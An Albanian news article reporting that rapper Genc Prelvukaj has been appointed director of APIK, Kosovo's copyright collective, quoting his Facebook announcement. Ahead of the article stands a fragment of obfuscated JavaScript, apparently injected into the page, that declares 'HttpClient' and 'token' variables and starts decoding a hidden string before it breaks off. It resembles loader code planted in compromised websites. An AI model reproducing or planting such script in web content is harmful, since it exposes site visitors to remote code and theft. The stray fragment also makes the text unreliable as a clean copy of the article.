;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Jo vetëm reper – Genc Prelvukaj emërohet në detyrën e re

By

Genc Prelvukaj ka marrë edhe një detyrë të re.

Reperi është emëruar udhëheqës i shoqatës “APIK”. Nëse nuk e dini, APIK është një shoqatë e cila merret me mbrojtjen e të drejtave të autorit dhe pronësisë intelektuale në Kosovë.

Lajmin e ka bërë të ditur Genci, përmes një statusi të gjatë në Facebook, me anë të cilit falënderoi të gjithë ata që ia kanë besuar këtë detyrë.

“Te nderuar autorë, prodhues dhe interpretë

Para pak ditesh bordi i Shoqates per menaxhim kolektiv të së drejtës së autorit : APIK, më ka besuar detyrën e pozitës së parë në ekzekutiv. Me pajtueshmëri të plotë të tyre, jam zgjedhur drejtor i shoqatës së vetme në vend që vihet në shërbim të autorëve, prodhuesve dhe interpreteve, e njohur dhe e licensuar nga organet shtetërore. Paralelisht me nderin e drejtimit të saj, vjen edhe një rruge e mundimshme, e gjatë, plot stres dhe shumë lodhje. Megjithatë duke besuar në mbështetjën e secilit përbrenda komunitetit artistik, gjërat mund ti shtyjmë edhe më tej në aspektin pozitiv. 
Shoqata “APIK” është drejtuar në kohën e saj më të vështirë, nga themelimi dhe deri sot, përreth shtatë viteve nga Florent Boshnjaku, puntor i madh dhe njeri i mirë me shumë vullnet, për ti dhënë kësaj cështje drejtimin e duhur. Është bërë shumë pavarësisht pengesave, problemeve, diskutimeve të shumta me cdo organ shtetëror apo subjekt juridik shfrytëzues i punës së autorëve, interpretëve dhe producentëve, punë e mbrojtur sipas ligjit në fuqi. 
Antarët e rregjistruar në “APIK” e kanë pasur gjithnjë parasysh rrugën e gjatë dhe të vështirë deri në realizimin e plotë synimeve mbi bazën e të cilës është themeluar shoqata. Në fazën ku ndodhet “APIK” tani, na pret një punë e vështirë, me shumë ngarkesë duke filluar me zgjerimin e ekzekutivit deri te fillimi i mbledhjës së detyrimeve ekonomike që transmetuesit e cfarëdo lloji, kanë ndaj komunitetit që “Apik” përfaqëson. Në këtë kontekst ftoj të gjithë autorët, prodhuesit dhe interpretët në vend, të qëndrojnë në mbështetje të “APIK”-ut , sepse me një ndërlidhje të tillë synimet dhe të mirat e përbashkëta do të jenë shumë më afer”, ka shkruar Genci.

Artikuj të ngjashëm